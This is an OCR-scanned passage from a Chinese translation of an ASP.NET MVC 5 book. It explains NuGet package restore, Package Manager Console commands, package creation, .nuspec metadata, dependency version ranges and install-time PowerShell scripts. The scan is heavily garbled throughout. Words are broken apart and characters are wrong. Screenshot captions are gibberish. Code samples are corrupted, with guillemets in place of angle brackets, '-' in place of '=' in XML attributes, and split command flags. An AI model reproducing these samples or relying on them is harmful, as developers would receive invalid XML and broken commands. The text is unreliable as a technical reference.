正如 前 面 提 到 的 ，NuGet 默认 的 工作 流程 是 把 包 文 件 夹 提交 到 版 本 控制 。 这 样 做 的 一 个 
好 处 是 可 从 版 本 控制 检索 解决 方案 ， 以 确保 构建 解决 方案 的 每 个 包 都 能 够 安装 ， 而 且 这 些 包 
还 不 需要 从 其 他 位 置 检 索 。 

然而 ， 这 个 方法 有 一 些 不 足 之 处 。Packages 文件 夹 不 是 Visual Studio 解决 方案 的 一 部 分 ， 
因此 ， 通 过 Visual Studio. 集成 管理 版 本 控制 的 开发 人 员 需 要 进行 一 个 额外 的 步骤 以 确保 
Packages 文件 夹 能 够 提交 。 如 果 碰 巧 使 用 TFS(Team Foundation System) 进 行 源码 控制 , NuGet 
会 自动 提交 Packages 文件 夹 。 

使 用 分 布 版 本 控制 系统 (DVCS)( 比 如 Git 或 Mercurial) 的 开发 人 员 还 会 面临 男 一 个 问题 。 
通常 情况 下 ，DVCS 不 擅长 处 理 二 进 制 文件 。 如 果 项 目 中 大 量 的 包 都 有 很 大 改变 ，DVCS JE 
会 变 得 很 大 。 在 这 种 情况 下 ， 我 们 就 不 需要 把 Packages 文件 夹 提 交 到 版 本 控制 了 。 

NuGet 1.6 引 入 了 包 修 复 功 能 来 处 理 这 些 问 题 ， 这 样 就 支持 一 个 新 的 工作 流程 ， 我 们 就 不 
需要 把 Packages 文件 夹 提 交 到 源码 控制 了 。 这 个 过 程 需要 手动 执行 几 个 步骤 : 对 每 个 项 目 都 


251 


252 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


需要 执行 单独 的 一 步 操作 ， 以 启用 包 恢复 ;而 且 在 NuGet 2.0-2.6 中 ， 每 个 开发 人 员 还 需要 配 
置 Visual Studio 来 允许 包 恢复 。 


注意 现在 ，NuGet 包 恢复 是 自动 启用 的 ， 但 是 在 Visual Studio 的 Package 
Manager 设置 中 使 用 下 面 两 个 选项 ， 可 以 禁用 包 恢 复 功 能 : 

e 人 允许 NuGet 下 载 缺 少 的 包 

e 在 Visual Studio 中 构建 应 用 程序 时 ， 自 动 检查 缺少 的 包 


通过 引入 自动 包 恢复 功能 ，NuGet 2.7 显 著 减 轻 了 我 们 的 工作 量 。 我 们 不 需要 在 项 目 或 
Visual Studio 中 执行 手动 操作 ; MSBuild 会 在 构建 应 用 程序 之 前 自动 执行 包 恢复 。NuGet 会 查 
看 Packages.config 文件 中 的 每 个 包 条 目 ， 并 下 载 解压 这 些 包 。 注 意 ， 这 不 需要 “安装 ” 包 。 
这 里 假设 包 已 经 安装 ， 并 且 对 解决 方案 做 的 所 有 更 改 已 经 提交 。 唯 一 缺少 的 是 Packages 文件 
夹 中 的 文件 ， 如 程序 集 和 工具 。 

对 于 使 用 原来 的 包 恢复 配置 的 应 用 程序 ， 做 一 些 简单 的 小 修改 ， 就 可 以 让 它们 使 用 自动 
包 恢 复工 作 流 。NuGet 的 文档 解释 了 这 个 过 程 : http://docs.nuget.org/docs/workflows/migrating- 
to-automatic-package-restore。 


10.2.5 包 管理 器 控制 台 的 用 法 


在 之 前 的 内 容 中 笔者 曾 提 到 ， 有 两 种 方式 可 以 实现 与 NuGet 的 交互 。 下 面 讲解 第 二 种 方 
5X: Package Manager Console。 这 是 Visual Studio 中 基于 PowerShell 的 控制 台 ， 提 供 了 强大 
的 功能 来 查找 和 安装 包 ， 此 外 ， 该 控制 台 还 支持 Manage NuGet Packages 对 话 框 不 支持 的 一 
些 功 能 。 

可 按照 以 下 步骤 启动 和 使 用 控制 台 : 

(1) 启动 控制 台 : 单 击 Tools | Library Package Manager | Package Manager Console， 如 图 
10-10 所 示 。 这 样 就 进入 了 Package Manager Console， 在 这 里 可 以 执行 在 对 话 框 中 可 以 执行 的 
所 有 操作 。 


FLE EDT VEW GT PROECT BUND DEBUG TEAM TOOLS TEST ARCHITECTURE WEBESSENTIALS ANALYZE 

Cobisi Routing Assistant pes - 07. 

eP Attach to Process.. [d 

*À Connect to Database.. 

^B Connect to Server 

GË Add SharePoint Connection. 

$$ Connect to Windows Azure. 
SQL Sever 

M) CodeSnipputs Maceger.. Cook Cui-B. 
Choose Toolbox tems. 
Add-in Manager... 
Library Package Manager » E Package Manager Console 

Bü. Extensions and Updates... Š Manage NuGet Packages for Solution.. 
PreEmptive Dotfuscator and Analytics h Package Visualizer 
Spy b64) 4 Package Manager Settings 

@ WCF Serice Configuration Editor 
Bternal Tools. 
Import and Export Settings.. 
Customize.. 

4 oon. 


图 10-10 
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(2) 执行 操作 : 使 用 Get-Package 命令 可 以 列举 出 联机 库 中 的 所 有 包 ， 还 可 以 提供 一 个 搜 
索 过 滤器 ， 如 图 10-11 所 示 。 
pU esse ote | 


Package source: nuget.org ~ 净 Defaut project -E 
Each package is licensed to you by its omner. Microsoft is not responsible for, nor does it grant any licenses to, third-party packages. Some packages way — 4 
include dependencies which are governed by additional licenses. Follow the package source (feed) URL to determine any dependencies. 


Package Manager Console Host Version 2.7.41101.971 
Type 'get-help NuGet to see all available NuGet coemands. 


[PH> Get-Package -Listhvallable -Filter Route 


2s v Description/Release Notes 
langular-UI-Router o. The de-facto solution to flexible routing with nested views 
Angular IS. Route 1 See the Angular2S.* packages for other Angular modules 
|AreGISSilverlight-Bing B The AGIS API for Silverlignt is a poserfül veb mapping API for Silverlight S applications. Te 

Sii ndowsPhone-Bing. x The ArcGIS Runtime SOK for Windows Phone is a powerful mapping API for Windows 
RiaLibrary .Web ? This is a helper extension which automatically registers all website routes conteining inside 
|I"NCRouteCache 1 Please take a look on http://benjamin-abt.com/blog/asp-net-mvc-routecache/ for further informati. 
|ietapiThrottle 1 WebApiThrettle handler is designed for controlling the rate of requests that clients can make to 
|ietapiRouteDebugger il ASP.NET Web API Route Debugger 
|attributeRouting E AttributeRouting for ASP.NET MVC lets you specify routes using attributes on your MVC controllers an... 
attributelouting evant E AttributeRovting for ASP.NET Web API lets you specify routes using attributes on your API controller... 
|ittributetouting. Hosted 3.5 icuting For self-hosted Web API lets you specify routes using attributes on your API contro... — . 
iow 
Error List | Package Manager Console 

图 10-11 


(3) 使 用 选项 卡 扩 展 : 图 10-12 展 示 了 在 Install-Package 命令 中 使 用 选项 卡 扩展 的 一 个 例 
子 。 顾 名 思 义 ， 该 命令 可 用 来 安装 包 。 与 智能 感知 功能 类 似 ， 选 项 卡 扩展 展示 了 一 个 与 已 输 
入 字符 匹配 的 包 的 列表 。 
[Derr hee EE 


Package source: nugetorg 7G Defaut project JE 
ph» Install-Packsge Rout| H 


Toutedebugger. 
RouteDecorator. 
Routelc Mve2. 

Routels Mve3 
RoutesMvet 

RouteJs MvcS 
RouteLocalizationMVC. 


oW ~ 
Error List Package Manager Console 


图 10-12 


PowerShell 命令 的 一 个 优点 就 是 支持 选项 卡 扩展 ， 这 意味 着 你 在 输入 一 个 命令 前 边 的 部 
分 字符 的 同时 ， 单 击 Tab 键 可 以 查看 要 输入 内 容 的 一 些 选项 。 

(4) 复合 命令 : PowerShell 也 支持 复合 命令 ， 比 如 通过 将 一 个 命令 管道 传输 到 另 一 个 命 
令 。 例如， 如 果 想 向 解决 方案 中 的 每 个 项 目 安装 一 个 包 ， 可 以 运行 下 面 的 命令 : 


Get-Project -All | Install-Package log4net 


第 一 个 命令 将 检索 出 解决 方案 中 的 所 有 项 目 , 并 将 检索 出 的 项 目 管道 输出 到 第 二 个 命令 ， 
然后 再 将 指定 的 包 安 装 到 这 些 项 目 中 。 

(5) 动态 添加 新 命令 : PowerShell 接口 的 强大 之 处 在 于 ， 安 装 的 一 些 包 可 以 为 shell 添加 
新 命令 。 例 如 ，EntityFramework 包 ( 新 ASPNET MVC 应 用 程序 中 默认 包含 该 包 ) 会 添加 用 来 
配置 和 管理 实体 框架 迁移 的 新 命令 。 

图 10-13 显 示 了 Enable-Migrations 命令 的 一 个 例子 。 
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~ € Defautproject WebApplication35 


ext targets an existing databsse... 
Code First Migrations enabled for project Webpplication35. 
PH> 


[oos ~ 
Error List Package Manager Console 


图 10-13 


默认 情况 下 ， 包 管理 器 控制 台 (Package Manager Console) 命 令 操 纵 的 是 “All” 包 源 ， 该 
包 源 是 所 有 配置 包 源 的 集合 。 可 以 使 用 控制 台 左上 角 的 Package source 下 拉 框 修改 当前 包 源 ， 
或 在 执行 命令 时 使 用 -Source 标志 指定 不 同 的 包 源 。-Source 标志 可 以 用 来 改变 命令 执行 期 间 
的 包 源 。 单 击 Package source 下 拉 框 右 侧 类 似 齿 轮 的 按钮 ， 打 开 包 源 配置 对 话 框 ， 在 其 中 可 
以 修改 包 源 配置 的 信息 。 

同样 ， 包 管理 器 控制 台 将 其 命令 应 用 于 默认 项 目 。 默 认 项 目 显示 在 控制 台 右 上 角 的 下 拉 
框 中 。 当 执行 一 个 包 安装 命令 时 ， 该 命令 只 应 用 于 默认 项 目 。 在 命令 中 使 用 -Project 标志 可 以 
将 该 命令 应 用 于 一 个 不 同 的 项 目 。 

想 了 解 更 多 包 管 理 器 控制 台 及 其 命令 的 引用 列表 ， 请 参阅 NuGet Docs， 网 址 为 


http://docs.nuget.org/docs/reference/package-manager-console-powershell-reference。 


© 注意 : 一 般 来 说 ， 使 用 Manage NuGet Packages 对 话 框 还 是 包 管 理 器 控制 台 | 
六 要 取决 于 个 人 喜好 。 我 们 是 喜欢 单 击 鼠 标 还 是 键入 字符 ?不 过 ， 包 管理 器 控制 
| 台 提 供 了 对 话 框 所 不 具有 的 几 种 功能 : 
(1) 使 用 -Version 标志 安装 特定 版 本 (例如 ，Install-Package EntityFramework - 
| Version 4.3.1). 
| (2) 使 用 -Reinstall 标志 重新 安装 已 安装 的 包 (例如 ，Install-Package JQueryUI - 
| ”Reinstall)。 这 在 删除 了 由 包 安 装 的 文件 时 或 者 菜 些 构 建 场景 中 很 有 用 。 
| (3) 使 用 -ignoreDependencies 标志 忽略 依赖 ((Install-Package jQuery. Validation - 
| ”ignoreDependencies)。 如 果 已 经 在 NuGet 外 部 安装 好 了 依赖 , 这 个 标志 就 很 有 用 。 
(4) 在 存在 依赖 的 情况 下 ， 强 制 邱 载 包 (Uninstall-Package jQuery -force)。 如 
果 想 在 NuGet 外 部 管理 依赖 ， 这 个 标志 就 很 有 用 。 


10.3 创建 包 


尽管 NuGet 可 以 非常 容易 地 使 用 包 , 但 是 如 果 没 有 人 创建 包 , 它 也 是 巧 妇 难为 无 米 之 炊 。 
这 也 是 NuGet 团队 确保 创建 包 尽 可 能 简单 的 原因 。 

在 创建 包 前 ， 确 保 已 从 NuGet CodePlex 网 站 上 下 载 了 NuGet.exe 命令 行 应 用 程序 包 ， 如 
果 尚 未 下 载 ， 请 访问 站 点 http://nuget.codeplex.com/。 然 后 将 下 载 的 NuGetexe 复制 到 硬盘 驱 
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动 器 的 合适 位 置 ， 并 把 该 路 径 添 加 到 PATH 环境 变量 中 。 
Update 命令 可 实现 NuGet.exe 的 自动 更 新 。 例 如 ， 运 行 下 面 命令 : 


NuGet .exe update -self 
或 使 用 简短 形式 : 
Nuget u -self 


可 以 通过 在 NuGetexe 当前 版 本 名 称 后 面 追加 .old 扩展 名 来 备份 当前 版 本 ， 然 后 使 用 
NuGet.exe 的 最 新 版 本 来 替换 当前 版 本 。 

安装 了 NuGet.exe 后 ， 创 建 包 需要 三 个 步骤 : 

(1) 把 包 的 内 容 整 理 在 一 个 基于 约定 的 文件 夹 结构 中 。 

(2) 在 .nuspec 文件 中 为 创建 的 包 指 定 元 数据 。 

(3) 对 .nuspec 文件 运行 NuGet.exe 的 Pack 命令 : 


Nuget Pack MyPackage.nuspec 


10.3.1 打包 项 目 


在 许多 应 用 场合 中 ， 包 中 只 包含 一 个 映射 到 Visual Studio 项 目 (.csproj 或 .vbproj 文件 ) 的 
程序 集 。 这 种 情形 下 ， 创 建 NuGet 包 是 很 简单 的 。 在 命令 提示 符 下 ， 导 航 到 包含 项 目 文件 的 
目录 ， 并 运行 以 下 命令 : 

NuGet .exe pack MyProject.csproj -Build 


如 果 导 航 到 的 目录 中 只 包含 一 个 项 目 文件 ， 我 们 就 可 以 忽略 项 目 文件 名 称 。 运 行 上 面 命 
令 就 会 编译 项 目 ， 并 用 项 目的 程序 集 元 数据 填充 NuGet 元 数据 。 

不 过 ， 通 常情 况 下 ， 我 们 想 自 定义 包 元 数据 。 可 以 通过 下 面 命令 来 实现 : 

NuGet .exe spec MyProject.csproj 

这 样 就 会 创建 一 个 .nuspec 文件 (本 节 后 面 会 进行 介绍 )， 其 中 包含 了 用 于 从 程序 集中 检索 
信息 的 更 换 令 牌 。 如 果 需 要 更 详细 地 了 解 这 方面 内 容 ， 请 参阅 NuGet 文档 ， 网 址 为 
http://docs.nuget.org/docs/creating-packages/creating-and-publishing-a-package。 


注意 NuGet 也 支持 打包 符号 包 ， 命令 为 NuGet Pack MyPackage.nuspec — 
Symbols。 然 后 ， 可 以 把 符号 包 发 布 到 SymbolSource.org 社区 服务 器 (默认 设置 )， 
也 可 以 发 布 到 公司 内 部 的 符号 服务 器 .这 就 允许 开发 人 员 在 Visual Studio 中 调试 
HEN NuGet 包 。 关 于 创建 和 发 布 符号 包 的 更 多 信息 ， 请 参阅 NuGet 文档 ， 网 址 
为 : http;//docs.nuget.org/docs/creating-packages/creating-and-publishing-a-symbol- 
package. 
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10.32 ”打包 文件 夹 


NuGet 也 可 以 基于 文件 夹 结构 来 创建 包 。 当 不 能 简单 地 从 项 目 映射 到 包 时 ， 这 一 功能 就 
有 具有 很 大 意义 。 例如， 为 使 程序 在 不 同 版 本 的 .NET 框架 中 运行 ， 包 中 可 能 就 会 包含 多 个 版 本 
的 程序 集 。 

默认 情况 下 , NuGet Pack 命令 递归 包括 指定 的 .nuspec 文件 所 在 文件 夹 下 的 所 有 文件 。 通 
过 在 .nuspec 文件 中 指定 要 包含 的 文件 集 ， 可 以 覆盖 这 个 默认 设置 。 

包 中 包含 三 种 类 型 的 文件 ， 如 表 10-1 所 示 。 


表 10-1 包 中 的 文件 类 型 


文件 夹 名 称 js xk 


Lib 其 中 包含 的 每 个 程序 集 (.dll 文件 ) 在 目标 项 目 中 都 作为 一 个 程序 集 来 引用 


Content 当 包 安装 完毕 时 ， 该 文件 夹 中 的 文件 会 被 复制 到 应 用 程序 的 根 目录 下 。 如 果 文 件 的 
扩展 名 是 .pp、.xdt 或 .transform， 那 么 在 复制 之 前 会 进行 转换 ， 下 一 节 将 介绍 这 方面 
的 内 容 

Tools 包含 一 些 可 能 在 解决 方案 安装 或 初始 化 过 程 中 运行 的 PowerShell 脚本 ， 以 及 一 些 可 


在 包 管理 器 控制 台中 访问 的 程序 


通常 情况 下 , 在 创建 包 时 , 需要 为 创建 的 包 设置 一 个 或 多 个 带 有 所 需 文件 的 默认 文件 夹 。 
大 部 分 的 包 会 向 项 目 中 添加 一 个 程序 集 ， 所 以 详细 地 了 解 了 lb 文件 夹 的 结构 是 很 有 必要 的 。 

如 果 使 用 包 的 开发 人 员 需 要 包 额 外 的 详细 信息 ， 可 参阅 包 根 目录 下 的 readme.txt 文件 。 
通常 情况 下 ， 当 包 安 装 过 程 完成 时 ，NuGet 会 打开 readme.txt 文件 。 然 而 ， 为 了 避免 打开 一 
连 串 的 readme 文件 ， 只 有 当 开发 人 员 直 接 安装 包 时 ， 才 会 打开 相应 包 的 readme 文件 ， 而 那 
些 作为 依赖 包 安 装 的 包 ， 不 会 打开 对 应 的 readme 文件 。 


10.3.3 ”配置 文件 和 源 代码 转换 


我 们 可 以 把 一 些 内 容 文 件 直接 复制 到 目标 项 目 中 ， 但 是 对 于 其 他 文件 ， 则 需要 进行 修改 
或 转换 。 例 如 , 如 果 要 在 项 目 中 添加 配置 信息 , 就 需要 合并 而 不 是 覆盖 web.config 文件 .NuGet 
提供 了 三 种 在 安装 期 间 转 换 内 容 的 方法 : 

e 使 用 配置 文件 转换 ， 将 配置 插入 到 web.config 或 app.config 文件 中 。 为 此 ， 可 为 源 

文件 名 称 添 加 后 组 .transform,， 这 样 一 来 , web.config transform 会 修改 目标 web.config, 
而 app.config.transform 则 会 修改 目标 app.config。.transform 文件 使 用 标准 的 配置 文件 
语法 ， 但 是 只 包含 要 在 安装 期 间 插入 的 节 。 
使 用 XML 文档 转换 (XDT，XML Document Transform) 语 法 修改 XML 文件 (包括 
web.config 和 app.config)， 为 其 名 称 添加 .install.xdt 后 级。 类 似 地 ， 使 用 .uninstall.xdt 
可 在 印 载 包 期 间 删除 更 改 。 简 单 的 配置 文件 转换 自动 发 生 , 不 受 我 们 控制 ,但 是 XDT 
Locator 和 Transform 特性 则 提供 了 完整 的 控制 ， 允 许 我 们 控制 如 何 修改 目标 XML 
文件 。 
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e 使 用 源 代码 转换 ,将 Visual Studio 项 目 属性 插入 到 目标 源 代 码 。 这 是 使 用 .pp 文件 扩 
展 名 完成 的 ，pp 是 项 目 属性 (project properties) 的 缩写 。 其 最 常见 的 用 法 是 通过 
$rootnamespace$ 属 性 ， 将 项 目的 名 称 空 间 应 用 到 应 用 程序 代码 。 

以 下 网 址 详细 描述 了 这 三 种 转换 方法 : http://docs.nuget.org/docs/creating-packages/ 


configuration-file-and-source-code-transformations 。 
10.3.4 NuSpec 文件 


当 创建 包 时 ， 我 们 需要 指定 一 些 关 于 该 包 的 信息 ， 如 包 人 D、 描 述 和 作者 等 。 所 有 这 些 元 
数据 都 在 .nuspec 文件 中 以 XML 格式 指定 。.nuspec 文件 也 用 来 驱动 包 的 创建 ， 并 在 创建 完成 
之 后 ， 包 含 在 包 中 。 

可 以 使 用 NuGet Spec 命令 生成 一 个 样板 文件 ， 以 快速 开始 编写 NuSpec 文件 。 然 后 使 用 
AssemblyPath 标志 和 程序 集中 存储 的 元 数据 生成 NuSpec 文件 。 例 如 ， 现 在 有 一 个 名 为 
MusicCategorizer.dll 的 程序 集 ， 以 下 命令 将 从 程序 集 的 元 数据 生成 一 个 NuSpec 文件 : 


nuget spec -AssemblyPath MusicCategorizer.dll 


这 个 命令 会 生成 下 面 的 NuSpec 文件 : 
<?xml version-"1.0"?» 
«package» 

«metadata» 


«id»MusicCategorizer«/id» 
«version»1.0.0.0«/version» 
«title»MusicCategorizer«/title» 
«authors»Haackbeat Enterprises«/authors» 
Xowners»Owner here«/owners» 
«licenseUrl»http://LICENSE URL HERE OR DELETE THIS LINE«/licenseUrl» 
«projectUrl»http://PROJECT URL HERE OR DELETE THIS LINE«/projectUrl» 
«iconUrl»http://ICON URL HERE OR DELETE THIS LINE«/iconUrl» 
«requireLicenseAcceptance»false«/requireLicenseAcceptance» 
«description» 
Categorizes music into genres and determines beats 
per minute (BPM) of a song. 
«/description» 
«releaseNotes»Summary of changes made in this release 
of the package. 
«/releaseNotes» 
«copyright»Copyright 2014«/copyright» 
«tags»Tagl Tag2«/tags» 
«dependencies» 
«dependency id-"SampleDependency" version-"1.0" /> 
«/dependencies» 
«/metadata» 
«/package» 


从 代码 中 可 以 看 出 , 所 有 NuSpec 文件 都 以 外 层 <packages> 元 素 开 始 。 该 元 素 必须 包含 一 
个 <metadata> 子 元 素 ， 并 包含 一 个 可 选 的 <files> 元 素 ， 后 面 会 讲解 这 一 点 。 如 果 我 们 遵照 前 
面 提 到 的 文件 夹 结构 约定 ， 那 么 <files> 元 素 就 没 必 要 了 。 
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10.3.5 “元 数据 


表 10-2 列 出 了 NusSpec 文件 的 <metadata> 节 点 中 包含 的 元 素 。 


表 10-2 metadata 元 素 


元 素 d ok 

id 必需 的 。 包 的 唯一 标识 符 

version 必需 的 。 包 的 版 本 ， 使 用 多 达 四 个 版 本 段 的 标准 版 本 格式 (如 1.1 或 1.1.2 
或 1.1.2.5) 

title 包 的 人 性 化 标题 。 如 果 省 略 ， 就 会 显示 ID 

authors 必需 的 。 以 和 逗号 分 隔 的 包 代码 的 作者 列表 

owners 以 逗号 分 隔 的 包 的 创建 者 列表 。 这 个 列表 往往 与 作者 列表 相同 (虽然 不 是 
一 定 如 此 )。 注 意 当 把 包 上 传 到 库 时 ， 库 中 的 账户 会 取代 这 个 字段 

licenseUrl 包 许 可 条 款 的 链接 

projectUrl 包 首 页 的 Url， 首 页 上 有 更 多 关于 包 的 信息 

iconUrl 在 对 话 框 中 作为 包 图 标 使 用 的 图 像 的 URL。 该 图 像 是 一 个 具有 透明 背景 


requireLicenseAcceptance 


的 32X32 像 素 的 .png 文件 
-个 bool 类 型 值 ， 指 示 客户 端 在 安装 包 之 前 ， 是 否 需 要 确保 接受 包 许可 
条 款 (licenseUrl 指向 的 页 面 内 容 ) 
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description 必需 的 。 包 的 详细 描述 ， 显 示 在 包 管理 器 对 话 框 的 右 侧 窗 格 中 

TeleaseNotes 包 在 当前 版 本 中 所 做 的 更 改 。 当 查看 包 更 新 时 ,我 们 应 该 阅读 发 布 说 明 ， 
而 不 是 描述 

tags -个 由 空格 分 隔 的 标签 和 关键 字 列 表 ， 用 来 描述 包 

frameworkAssemblies .NET 框架 程序 集 引 用 列表 ， 这 些 引 用 会 添加 到 目标 项 目 中 

references lib 文 件 夹 中 的 程序 集 名 称 ,这 里 的 名 称 会 作为 程序 集 引 用 添加 到 项 目 中 。 
如 果 想 添加 lib 文件 夹 下 的 所 有 程序 集 , 就 采用 该 元 素 的 默认 值 ， 也 就 是 
把 该 元 素 置 空 。 如 果 指 定 了 引用 ， 仅 把 指定 的 引用 添加 到 项 目 

dependencies 通过 <dependency> 子 元 素 指定 的 包 的 依赖 项 列表 

language 为 包 设置 的 微软 区 域 ID. 字符 串 ( 或 LCID 字符 串 )， 如 en-us 

copyright 包 的 版 权 信 息 

summary 包 的 简短 描述 ， 展 示 在 包 管 理 器 对 话 框 的 中 间 窗 格 中 


由 于 包 的 TD 必须 是 唯一 的 , 因此 认真 地 选择 TD. 非常 重要 。 在 执行 命令 安装 或 更 新 包 时 ， 


通常 


ID 来 标识 一 个 包 。 


包 ID 的 格式 与 .NET 名 称 空间 的 命名 规则 是 一 样 的 。 因 此 ，MusicCategorizer 和 
MusicCategorizer. Mvc 是 有 效 的 包 ID, ifii MusicCategorizer! Web 是 无 效 的 。 
元 数据 节 中 还 可 以 包含 另外 一 个 特性 minClientVersion, 用 于 指定 安装 该 包 所 需 的 NuGet 


的 最 低 版 本 。 指 定 该 特性 时 ，NuGet 和 Visual Studio 都 会 遵循 该 限制 。 
minClientVersion 设置 时 , 如 果 NuGet 的 版 本 低 于 2.7, 那么 用 户 将 不 能 使 用 


例如 ， 指 定 了 如 下 
NuGet.exe 或 Visual 
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Studio 安装 该 包 : 


«metadat 


a minClientVersion-"2.7"» 


10.3.6 ”依赖 库 


许多 包 都 不 是 独立 开发 的 ， 它 们 本 身 都 或 多 或 少 地 依赖 于 其 他 库 。 如 果 依赖 的 这 些 库 可 
以 NuGet 包 的 形式 获得 的 话 ， 最 好 就 不 在 包 中 包含 它们 ,而 是 在 包 的 元 数据 中 把 它们 指定 为 
包 的 依赖 库 。 如 果 那 些 依赖 库 没有 以 包 的 形式 存在 ， 我 们 可 以 考虑 联系 它们 的 所 有 者 ， 帮 助 
他 们 把 库 打包 。 

每 个 <dependency> 元 素 都 包含 两 部 分 主要 信息 ， 如 表 10-3 所 示 。 


version 


从 表 10-39 


表 10-3 dependency 元 素 
描 o 
依赖 的 包 ID 
可 能 依赖 的 包 版 本 的 范围 


可 以 看 出 ，version 特性 指定 了 版 本 范围 。 默 认 情况 下 ， 如 果 只 输入 一 个 版 本 


号 ， 例 如 <dependency id-"MusicCategorizer" version="1.0W>， 就 表明 该 版 本 号 是 依赖 包 的 最 
小 版 本 号 。 在 上 面 的 例子 中 ，version="1.0" 就 指定 了 依赖 库 的 最 小 版 本 号 是 1.0， 即 依赖 的 
MusicCategorizer 包 必 须 是 1.0 及 其 后 续 版 本 。 

如 果 需 要 更 多 地 控制 依赖 库 ， 可 以 使 用 间隔 符号 来 指定 范围 。 表 10-4 展 示 了 指定 版 本 范 


围 的 多 种 方法 。 
表 10-4 ”版 本 范围 

1.0 1.0 及 其 以 上 版 本 。 使 用 最 普遍 的 用 法 ， 本 书 推荐 使 用 
[1.0, 2.0) 1.0 一 2.0 之 间 的 版 本 ， 其 中 包括 1.0 版 本 ， 但 不 包括 2.0 版 本 
(,1.0] 1.0 及 其 以 下 版 本 
(1.0) 1.0 以 下 版 本 
[1.0] 1.0 版 本 
(1.0,) 1.0 以 上 版 本 
(1.0,2.0) 1.0 一 2.0 之 间 的 版 本 ， 其 中 既 不 包括 1.0 版 本 ， 也 不 包括 2.0 版 本 
[1.0,2.0] 1.0 一 2.0 之 间 的 版 本 ， 其 中 既 包 括 1.0 版 本 ， 也 包括 2.0 版 本 
(1.0, 2.0] 1.0 一 2.0 之 间 的 版 本 ， 其 中 不 包括 1.0 版 本 ， 但 包括 2.0 版 本 
(1.0) 无 效 的 版 本 范围 设置 
Empty 所 有 版 本 


一 般 情 况 下 ， 推 荐 只 指定 一 个 版 本 范围 的 下 界 。 在 许多 应 用 场合 中 ， 这 种 方法 可 以 给 安 
装 包 的 人 更 多 的 机 会 使 用 包 ， 而 不 会 因为 该 包 依赖 项 的 更 新 导致 过 早 地 终止 了 它 的 使 用 。 对 
于 强 命名 的 程序 集 , NuGet 会 自动 地 向 目标 项 目的 配置 文件 中 添加 合适 的 程序 集 绑 定 重 定向 。 
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想 深入 了 解 NuGet 所 利用 的 版 本 策略 ， 请 参阅 David Ebbo 的 系列 博客 ， 网 址 为 
http://blog.davidebbo.com/2011/01/nuget-versioning-part-] -taking-on-dll.html . 


10.3.7 ”指定 要 包含 的 文件 


如 果 遵照 前 面 描 述 的 文件 夹 结 构 约定 ， 就 没 必要 在 .nuspec 文件 中 指定 要 包含 的 文件 列 
表 。 但 在 一 些 应 用 场合 中 ， 可 能 需要 显 式 地 指出 要 包含 的 文件 。 例 如 ， 在 一 些 包 的 构建 过 程 
中 ， 我 们 宁愿 选择 要 包含 的 文件 ， 也 不 愿 把 这 些 文件 复制 到 基于 约定 的 文件 夹 结构 中 。 可 使 
<files> 元 素 指定 要 包含 的 文件 。 

注意 ， 如 果 指 定 了 文件 ， 就 会 忽略 约定 ， 而 包 中 只 包括 .nuspec 文件 中 列 出 的 文件 。 
<files> 元 素 是 <package> 元 素 的 可 选 子 元 素 ， 其 中 包含 一 组 <file> 元 素 。 每 个 <file> 元 素 指 
定 了 包 中 所 包含 文件 的 原始 位 置 和 目标 位 置 。 表 10-5 描 述 了 这 些 特性 。 


表 10-5 ”版 本 范围 
dà xh 
包含 文件 (或 文件 组 ) 的 位 置 。 相 对 于 NuSpec 文件 的 路 径 ， 除 非 指定 的 是 绝对 路 径 。 支 持 
通配符 "*"， 两 个 通配符 "**" 则 表示 递归 目录 查找 
可 选项 。 文 件 或 文件 组 的 目标 路 径 。 在 包 中 是 一 个 相对 路 径 ， 例 如 ，target="lib"， 或 
target="libmet40"， 此 外 ， 还 有 其 他 一 些 典 型 值 ，target="content" 或 target-"tools" 


属 性 


src 


target 


下 面 展示 了 一 个 典型 的 <files> 元 素 : 


<files> 

«file src="bin\Release\*.dll" target-"lib" /> 
«file src="bin\Release\*.pdb" target-"lib" /> 
«file src="tools\**\*.*" target-"tools" /> 
</files> 


所 有 路 径 都 会 被 解析 成 相对 于 .nuspec 文件 的 路 径 ， 除 非 指定 了 绝对 路 径 。 想 了 解 <files> 
元 素 的 更 多 信息 ， 请 查阅 NuGet 文档 的 规范 说 明 ， 网 址 为 


http://docs.nuget.org/docs/reference/nuspec-reference . 


10.3.8 IR 


包 中 可 以 包含 安装 或 卸载 时 自动 执行 的 Powershell 脚本 。 一 些 脚本 可 以 向 控制 台 添加 新 
的 命令 ， 如 EntityFramework 包 。 

下 面 展 示 一 个 向 包 管 理 器 控制 台 添加 新 命令 的 例子 。 在 该 场合 中 , 尽管 包 不 是 特别 有 用 ， 
但 它 能 说 明 一 些 有 用 的 概念 。 

我 一 直 很 喜欢 玩 “神奇 8 号 球 ”(Magic 8-Ball) 这 个 游戏 。 不 熟悉 这 个 游戏 不 要 紧 ， 它 的 
游戏 规则 非常 简单 。 它 是 一 个 大 号 的 8 号 球 ( 打 台 球 或 口袋 台球 时 使 用 的 那 种 )。 首 先 ， 问 8 号 
球 任意 一 个 答案 为 yes 或 no 的 问题 ， 然 后 摇 一 摇 8 号 球 ， 之 后 会 出 现 一 个 清晰 的 小 窗口 ， 我 
们 能 够 看 到 20 面 体 (20 面 ) 的 一 面 ， 上 面 显 示 有 问题 的 答案 。 

可 以 创建 自己 的 神奇 8 号 球 版 本 ， 然 后 将 其 打包 成 能 向 控制 台 添加 新 的 PowerShell 命令 
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的 包 。 我 们 从 编写 名 为 initpsl 的 脚本 开始 。 按 照 约定 ， 包 的 tools 文件 夹 中 带 有 该 名 称 的 脚 
本 会 在 解决 方案 打开 时 执行 ， 允 许 向 控制 台 添加 命令 。 

表 10-6 展 示 了 一 个 包含 所 有 特殊 PowerShell 脚本 的 列表 ， 当 NuGet 执行 这 些 脚本 时 ， 它 
们 必须 都 包含 在 包 的 tools 文件 夹 中 。 


3k10-6 ”特殊 的 PowerShell 脚本 
名 WW Ho ok 
Init.psl 它 在 包 第 一 次 安装 到 解决 方案 的 项 目 中 时 执行 。 如果 同样 的 包 被 安装 到 同一 解决 方案 的 
其 他 项 目 中 , 在 安装 过 程 中 该 脚本 不 再 执行 。 该 脚本 也 在 每 次 在 Visual Studio 中 打开 解 
决 方案 时 执行 。 它 对 于 向 包 管 理 器 控制 台 添加 新 命令 特别 有 用 


Install.ps1 当 包 安装 到 项 目 时 执行 。 如 果 同 样 的 包 被 安装 到 同一 解决 方案 的 多 个 项 目 中 ， 该 脚本 在 
每 次 安装 包 时 都 会 执行 。 这 对 于 在 NuGet 正常 步骤 以 外 采取 其 他 安装 步骤 时 特别 有 用 
